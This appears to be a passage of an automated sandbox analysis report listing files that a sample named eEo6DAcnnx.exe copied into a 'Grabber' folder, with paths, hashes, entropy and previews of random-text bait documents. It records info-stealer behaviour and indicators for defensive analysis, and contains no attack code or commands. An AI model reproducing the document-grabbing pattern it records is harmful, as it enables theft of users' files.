Preview:	KLIZUSIQENZWQAFPHPIZMRSSYSYIINGOAPFQHPCFTPTNYLSNMTRTDZSWEBKDRHIUFOFGWKTHENHAQWTYTMOJNOWPWJAPIZKOPDMUAKVTHXYWDBHBVWDTBCFVXJHDCUGTPASHSDSKUVYPRPPUXKURDNZYJENQKRHCARIUAOIAFRFWGQDXOAPXUJAUWRVEASXCVARWJMIPINSQDPGOWLRMNRCAEZGZIYDWBEWCOJWHLMOUROGZKCFGXDKPHAJADQCYUZYSYXQOIEGZIJWZLUJEKZUASKHQOGVFGVEXIQTENJDEKERNBPZGKNXWYZVXDDAYNSFBZAKWCEEYDSJONDKOYOBSAVICMHPZZRHRLNYDOIDQNYLXFDCCUOIJANPQCOIJDXFLDMIBVHBYSNYGAVWTHYCIPBRPTWSQXWXZZJBFNAUOMALKDRYIMJCRJXXQXCEREPQGNQHHOFEMEOXMSZEWOLTOLCOUCQNPRIPXUSVZNATFZKIJQZKGKTCYOMBXFTSXBXYIHMOONWWGRKPSNEMONASEFSVWNWIBXDSMEKQJIDCFPVMGAAUPBVOYAIKYQEFVSXOFTEMHNXVNMMENORLDYPZUSILNZRPHITCWDQMLEFZOEGPJDXQLBSIYRONLBYOSJVTEMBHNVXCMMRDVOAYSMNNRKRLBSQBIWIWHYUMBKTIYQTROZKTGZZMEFWINSQAXMWWLRRSPXAQZURXOTMUHPNLOUWMXRQSGXIAQILQCZUUTRJZVRNLBSHADNHZSDOQIYIZCEZHFRITTHSZOSBZGNCQVHXSFZJCEVSJCZZYTCFXLNBKMTPXYHPDXMMMXHUAAQWYYFHMKXWZBXZBWKFQHLPMVMGYFZBMVSYGKGTOLLJCBFKHHWFIVPPXPTVEJEBZBXHKNYKDYLIAKLLPJZFPVJAROJUOZZUWNZRRDZNYLGBHMNWUKJLSAXBUBWJZYCMVLYBCQJLBOROBDSZGHMCIASVUCVNDTGDALKYLTOMJK

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ZGGKNSUKOP\NYMMPCEIMA.png

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6957997909429325
Encrypted:	false
SSDEEP:	24:kKnyV7BxweFQl79j+hRxUY//oWt/yeHEMcXJn25feaqrZZqW+LRJvy:kKnY7wGQlSxH/9kM0Jn25grZgRJa
MD5:	4F49714E789620AEDB7B9565DC949466
SHA1:	5917AC09E3D5074BFF8E1289865CAFF6403D1E82
SHA-256:	A9D5D3D8BE1D9E0187DA4AF85AFF3E2D1D6DE977D13EDA76900C96D98A8F073B
SHA-512:	61F147FA2B300AC2E3A42445F1283A47C805B756F36730CDCD4DB5A711BE43EFA471C7ECFB865908791852D1AAF365284BD4DE01F0EA0BF9DCD416A853C804E9
Malicious:	false
Preview:	NYMMPCEIMABCZIWJTJBTGSCCAGUWVTYLYWSVBSDZXQVJYUDCVLRURABBOBVCVDMKRKSRCSPXNAWPZJIOBULMRNUUOMOQGMWJLMZDBRBKAATADQPXHJFNCLPVAYDJHNDQMYWKBXYCBZJQANHQXCJPZQWORFXISYXSVTGTQJXNOUHRMKMJWJYCVNYAJFLKQVPGEYIUPPSZIHLNRGNCVNQBEZHDSJLAAKTOQOPFKISQUVSYIJUTXMPMVSFBVQNNFUXQRBBZWPVQFKOIAVQQMWQKLBSRPGKOQWZJAMBIDYJLYFILNAEEJCLRGBXDTSTBTNJDUXNFJBEZUDHSQUEENVIJUBNKGOLASBWAZBYYZZCOGWIJLRICWMFOAHSZVHCPRGDQXQUHZNZAIBOSXNAEYXAGWDBIHQGHOMKGZVYJDFBRWFKGJWGGPPTKNYWOHJZEIWRXWBERKQREQFMJHAKYHJCBTJJONCVMKTRJZVEWZOAKRUZLPQOXEQLKYATRQESEWRXETALDGKSHWFGQVXVYWPZEUDKTVGFGTXHQNKYUTVLNVAJFDYFPLRACHLYNSSVZZIAKKEEENZFLNPGNCVKMHGOYMQEBOXNMEXNXHUPMZAMZZQVDPFGLUSJHKGQWGKDPXMSIYPGNIXUXSJQFAXJLLSOUEANCWYAHDTOQTEKVGNOWSZINVNYZYIYNTVHHTDVGBTBPYPINRBPJYKHMRFCGSMCNFESVFMQIFPOJDAJGZEYTMLYQIIYRBVNEZSIWWOKGVIVGLXAQUNYDTWHGEWOLDMZRPSOAJKFXVJJTTIAJVLZGIFIWTHVZZGQOVGNSYXTJVFSXNDQLHICPBSAZIKIPLGSRTCKFEGRKNLTONCJFACYIGQPYUHVPNPUUGOOGHBAMCKOGYKVNNBSVPYVHZVJCMTDSHLBWEDMSWSFZAIRFDEYBDVHTWHABAXCAQCTXQRIUHVQFAEPMNYIWIBWVEEZTZGQTPDYRFAGKUGAEBSQFYYQG

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ZGGKNSUKOP\ZGGKNSUKOP.docx

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6959554225029665
Encrypted:	false
SSDEEP:	24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
MD5:	DCABA2748DFEAEF0BFBC56FD9F79315C
SHA1:	B87FBA690A774893B22B9F611DFDCB5CDC520269
SHA-256:	86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
SHA-512:	65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
Malicious:	false
Preview:	ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Desktop\desktop.ini

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	282
Entropy (8bit):	3.514693737970008
Encrypted:	false
SSDEEP:	6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlWygDAlLwkAl2FlRaQmZWGokJISlfY:QZsiL5wmHOlDmo0qmWvclLwr2FlDmo0I
MD5:	9E36CC3537EE9EE1E3B10FA4E761045B
SHA1:	7726F55012E1E26CC762C9982E7C6C54CA7BB303
SHA-256:	4B9D687AC625690FD026ED4B236DAD1CAC90EF69E7AD256CC42766A065B50026
SHA-512:	5F92493C533D3ADD10B4CE2A364624817EBD10E32DAA45EE16593E913073602DB5E339430A3F7D2C44ABF250E96CA4E679F1F09F8CA807D58A47CF3D5C9C3790
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.3.....

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Documents\EIVQSAOTAQ.pdf

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692024230831571
Encrypted:	false
SSDEEP:	24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
MD5:	086908C2D2FAA8C9284EAB6D70682A47
SHA1:	1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
SHA-256:	40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
SHA-512:	02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
Malicious:	false
Preview:	EIVQSAOTAQGMTJLIEKHIWADNDLJLEWUUXVGOFMOKPHABQUHVNBFVSKQIGVIHICGEEXRLSTKQNZUKOHPLLTCYQSLQJMPWPWNUJFUONDXMYCCUPDUBYMPUSUKUOWWSWDLZMDWKNMUKNPKBXAJATSGOQUAMHMZDCDDJRHKOUEDMLSCIOXAHAUFDQKBUBESAKMMFMHDLSSVUQLOZXARPGPMGAAKVDEITBYGGXWIGUIJRVXQOBOIOJWPYSPHZBHWQTMDCUFCWBQSAZNRUOPCLATAERLBPATETXMFUGXBEGMNPKKEZVSRLCYPFEPWIAEINAMGSOXLYWMUKYSQACPSUTGHDCTFLXKAMLOCGYHCMAETHVZNZOCWWUHYAPHFILDNLLBMLSLXIMOFGWTDVLWPHHRGGAWSIGNXEJRIBIBLWFBUASCLZPUIVDERXYLWTNLLRLTFZJTTDGFOEYPFXIPHFKEXHOGEHSFYCCCTGNFQFYETBADKAEAOXYXJWDJWNZPEOBJZTKPLJPPMICDOWUIVDKBQQMHETDORVKZPOWTAZRBAQYYQHBNHIWFZXBILGKHZBLSQJJEIYBHUIDAOEXERQEUMMKBWDXSMLJVAZJQPZARLOBNSTUDCVKLCVBPTKTJWSMPMKSFOQPINFTNEGPVSYCWOXABSGFFKRQDFQEIJWDUMZKILALUHYQZGZOLYMKSAOZGUYCKJOJLYINHVKCTZVXLYIYPGOQZQQAGXVWEBSURTQECDRXYKQAJBEKDNSIHNBZCUBIKPKVWLUOFFCIZSKQBAAPGFMBASMUOKLLGWEHHMYDJCOQEKOBYLYWOOZLBASOJJYLIHZKUGUKHZQBIAVUPYHYEWAYGUFNARHCUKTFMLHSFLRVAELAFCQHPEFUSGNONWLLYQVUVSVEKHDRXJHDSSFJATGDRCTMICJWPFPKKLXECKUXREXEAQNPOBPRKFYRWIWXEWLAPUSHGKXWYYIJNUMGQHBJPMOYZIXPGOJLOQG

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Documents\EOWRVPQCCS.docx

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692990330209164
Encrypted:	false
SSDEEP:	24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
MD5:	DD71B9C0322AD45992E56A9BCE43FE82
SHA1:	60945B6BC3027451A2E1CFA29D263A994F50E91A
SHA-256:	19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
SHA-512:	86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
Malicious:	false
Preview:	EOWRVPQCCSGUYRPSSKREBPXVQXUWKHGDIJHLBLYMXTIUESLNTSFMRJGDSQHOWECQAJMENKQNNWPVETUPWMXJTCUIAKPCZEENXVLTKYPKROZPDEBFNAJOVCNEXQJFUHQCMLNHGMRJJIPLOMWFWJKKXSTRHWFVLVQPEMFBLDTSCCSXADJIIDQIYCEGSDEDZDWUEJLTYJHMYEHHMBFZCRDHXZVPESWNDGUEFQZTJFSJVKZMWREMIZGAIZANQJKWWXITTXHDQDZOEOGKCEMDUUBDTMNWBRSOWEKQXQDCYJXERQRAMVQCWCTYJPEAJUAWNBRQWGFJAHXJJFRYTZMSGCREPRECKHXXMJGSQEKUCUNCWUAAPBWQVSMWCJGYSLPHJJHJGXSMNLNICJMSGSWRKARHMQXLYSAOPDAPXSMORZLUWYOQTJQNKSCAJWRUEYRFPNOVSMNYRKMTSGRIFLOAJUGJYDTLINOTCEADKRENVYNODFSIJGSDCICIDXZTLLSKKJQSOHYTZRBSHPHXWZOOSKQIRSGPTAOQPBVJAMXOGPYNJMJXAKCTMRRTFCBPOAMNJORWRNZOGZMNBVCCZYQPOQOUXBGKNLFSQWAWEREFQBRDLTVHEFNRUSOARHJPRECDRMPANZRBGCANIUWEBUDVWLYHFTPGBHSZBZBEFUWFHUZPJOVMHGSINZWDUKWPGMGSNSSJNOMETOCJILXRQRGZQFAJCWYQEENIZIMHRBTZUYEOKCQXYLWCKFHOHCOVRVPNTEUARVJEFALBUVYXIYZRMGJWZNYNLPYHZSSCODVXZBIWXIOAVMGMPKCPYIFZIKWRIHNIYASXZLMOLNZOMMYUSCRZBCXRANWWODLPHCXXDPLNYLMHYIUYZJWQLECFNXQEERYDVDBPXOLGZLZQCVYUYKFZGKXWVDQANPXQYAATYFJALGENVLDMHDASWKNNXODUHLXYGCBUKEFWISCCUWXNUNETWMTQHQDJMAXNPFPLMPQO

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Documents\EOWRVPQCCS\EIVQSAOTAQ.pdf

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692024230831571
Encrypted:	false
SSDEEP:	24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
MD5:	086908C2D2FAA8C9284EAB6D70682A47
SHA1:	1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
SHA-256:	40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
SHA-512:	02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
Malicious:	false
Preview:	EIVQSAOTAQGMTJLIEKHIWADNDLJLEWUUXVGOFMOKPHABQUHVNBFVSKQIGVIHICGEEXRLSTKQNZUKOHPLLTCYQSLQJMPWPWNUJFUONDXMYCCUPDUBYMPUSUKUOWWSWDLZMDWKNMUKNPKBXAJATSGOQUAMHMZDCDDJRHKOUEDMLSCIOXAHAUFDQKBUBESAKMMFMHDLSSVUQLOZXARPGPMGAAKVDEITBYGGXWIGUIJRVXQOBOIOJWPYSPHZBHWQTMDCUFCWBQSAZNRUOPCLATAERLBPATETXMFUGXBEGMNPKKEZVSRLCYPFEPWIAEINAMGSOXLYWMUKYSQACPSUTGHDCTFLXKAMLOCGYHCMAETHVZNZOCWWUHYAPHFILDNLLBMLSLXIMOFGWTDVLWPHHRGGAWSIGNXEJRIBIBLWFBUASCLZPUIVDERXYLWTNLLRLTFZJTTDGFOEYPFXIPHFKEXHOGEHSFYCCCTGNFQFYETBADKAEAOXYXJWDJWNZPEOBJZTKPLJPPMICDOWUIVDKBQQMHETDORVKZPOWTAZRBAQYYQHBNHIWFZXBILGKHZBLSQJJEIYBHUIDAOEXERQEUMMKBWDXSMLJVAZJQPZARLOBNSTUDCVKLCVBPTKTJWSMPMKSFOQPINFTNEGPVSYCWOXABSGFFKRQDFQEIJWDUMZKILALUHYQZGZOLYMKSAOZGUYCKJOJLYINHVKCTZVXLYIYPGOQZQQAGXVWEBSURTQECDRXYKQAJBEKDNSIHNBZCUBIKPKVWLUOFFCIZSKQBAAPGFMBASMUOKLLGWEHHMYDJCOQEKOBYLYWOOZLBASOJJYLIHZKUGUKHZQBIAVUPYHYEWAYGUFNARHCUKTFMLHSFLRVAELAFCQHPEFUSGNONWLLYQVUVSVEKHDRXJHDSSFJATGDRCTMICJWPFPKKLXECKUXREXEAQNPOBPRKFYRWIWXEWLAPUSHGKXWYYIJNUMGQHBJPMOYZIXPGOJLOQG

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Documents\EOWRVPQCCS\EOWRVPQCCS.docx

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692990330209164
Encrypted:	false
SSDEEP:	24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
MD5:	DD71B9C0322AD45992E56A9BCE43FE82
SHA1:	60945B6BC3027451A2E1CFA29D263A994F50E91A
SHA-256:	19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
SHA-512:	86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
Malicious:	false
Preview:	EOWRVPQCCSGUYRPSSKREBPXVQXUWKHGDIJHLBLYMXTIUESLNTSFMRJGDSQHOWECQAJMENKQNNWPVETUPWMXJTCUIAKPCZEENXVLTKYPKROZPDEBFNAJOVCNEXQJFUHQCMLNHGMRJJIPLOMWFWJKKXSTRHWFVLVQPEMFBLDTSCCSXADJIIDQIYCEGSDEDZDWUEJLTYJHMYEHHMBFZCRDHXZVPESWNDGUEFQZTJFSJVKZMWREMIZGAIZANQJKWWXITTXHDQDZOEOGKCEMDUUBDTMNWBRSOWEKQXQDCYJXERQRAMVQCWCTYJPEAJUAWNBRQWGFJAHXJJFRYTZMSGCREPRECKHXXMJGSQEKUCUNCWUAAPBWQVSMWCJGYSLPHJJHJGXSMNLNICJMSGSWRKARHMQXLYSAOPDAPXSMORZLUWYOQTJQNKSCAJWRUEYRFPNOVSMNYRKMTSGRIFLOAJUGJYDTLINOTCEADKRENVYNODFSIJGSDCICIDXZTLLSKKJQSOHYTZRBSHPHXWZOOSKQIRSGPTAOQPBVJAMXOGPYNJMJXAKCTMRRTFCBPOAMNJORWRNZOGZMNBVCCZYQPOQOUXBGKNLFSQWAWEREFQBRDLTVHEFNRUSOARHJPRECDRMPANZRBGCANIUWEBUDVWLYHFTPGBHSZBZBEFUWFHUZPJOVMHGSINZWDUKWPGMGSNSSJNOMETOCJILXRQRGZQFAJCWYQEENIZIMHRBTZUYEOKCQXYLWCKFHOHCOVRVPNTEUARVJEFALBUVYXIYZRMGJWZNYNLPYHZSSCODVXZBIWXIOAVMGMPKCPYIFZIKWRIHNIYASXZLMOLNZOMMYUSCRZBCXRANWWODLPHCXXDPLNYLMHYIUYZJWQLECFNXQEERYDVDBPXOLGZLZQCVYUYKFZGKXWVDQANPXQYAATYFJALGENVLDMHDASWKNNXODUHLXYGCBUKEFWISCCUWXNUNETWMTQHQDJMAXNPFPLMPQO

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Documents\EOWRVPQCCS\EWZCVGNOWT.jpg

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690071120548773
Encrypted:	false
SSDEEP:	24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
MD5:	8F49644C9029260CF4D4802C90BA5CED
SHA1:	0A49DD925EF88BDEA0737A4151625525E247D315
SHA-256:	C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
SHA-512:	CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
Malicious:	false
Preview:	EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Documents\EOWRVPQCCS\GIGIYTFFYT.png

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.7020597455120665
Encrypted:	false
SSDEEP:	24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
MD5:	47F4925C44B6916FE1BEE7FBB1ACF777
SHA1:	D7BFAEF09A15A105540FC44D2C307778C0553CE5
SHA-256:	62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
SHA-512:	6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
Malicious:	false
Preview:	GIGIYTFFYTJMXILDVGFXDVEFQCHNFYFEULLQEETZRJVMRRJHJRTSPPAOMDMYNAGWNEBMIDVTHKVEEQISBNMPHNFVYDEIXBDPFHYTCLNZABIXDFYKJDBRYRTWDLZOXHMMCFSILUYMHVQPPEGCEUDABQUBALGXBEBBTFQFPGZCSFMMFCTBAMXKOPCAJHDRXWLGLWELWIKNGHWJKDKBDVZPNHUCSZFTPSDHZOUUHUWDVSEAQXIDUUMNXESGKGQYYBWVWCBVILKQLVAXNHJSZYYZUWKUTBRCTNQQXVQCKHLEJIFZFWACZEFAUJYVSEGBIHIZRMKJYWHTJECURPVKKWUKKOFVGYEOSDEDBUWBYBNHTAOSHDXDTPIWBWQANBSHMKUUHFNTKLQLSWCOLNGFZPIBZTKTDJTYYNNHDUOZEFWBJRQDBJTCXGDSCYEYJCUVSMWPBPZCBDOMCVGPOYMXSQANNOXIQBZMOMUCJZXAGIICUFLFDZJOBTEGSAQHEIBBWATDCJXSEIADCNGGARMLYLRJZSIBRRPFAORVDSNHOQWANXTRGLRQZZTEROQRQYBPGYXMSIGOYQMJDIJSQBFLNMQOGKOFUQVIWNLZBQMUSTEPCUCGVOFNLQMYFHDEDLGEYXHBHQNMKSASMZZEYCWBNZKYTKNRWJBUJJTXRIHTHPKRBWIFFKIBKCVEEYOHLCOOBFBXELQKMEOTDDLPFFLMCBOAJRNITAVONLYXBCYITNNXEUAVAVDHVGOGFHPXZDZUUQPRYTGQIFNRRHVDFAGSLTNZENPMFBPWMOHFFCIEPUUGBVHDOBSRPRHEPPLYLJUVAKAYIJRZKMAKRPYDSBIZTPWQFSZBWKYUIQXRDRUUPAWFEQRHVNMAPCFIPTHYPQPAZQNEACARWXUWSRKGERYPPRVAAPAVQYFCPYCRXLJQAMPXGLECYIZDRHPEMJPTXFOJABHMNZZHXHBCYXJEKEEQGKOAGJVHRWOSVEPEFFHDAVPR

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Documents\EOWRVPQCCS\ZGGKNSUKOP.xlsx

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6959554225029665
Encrypted:	false
SSDEEP:	24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
MD5:	DCABA2748DFEAEF0BFBC56FD9F79315C
SHA1:	B87FBA690A774893B22B9F611DFDCB5CDC520269
SHA-256:	86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
SHA-512:	65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
Malicious:	false
Preview:	ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Documents\EWZCVGNOWT.jpg

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
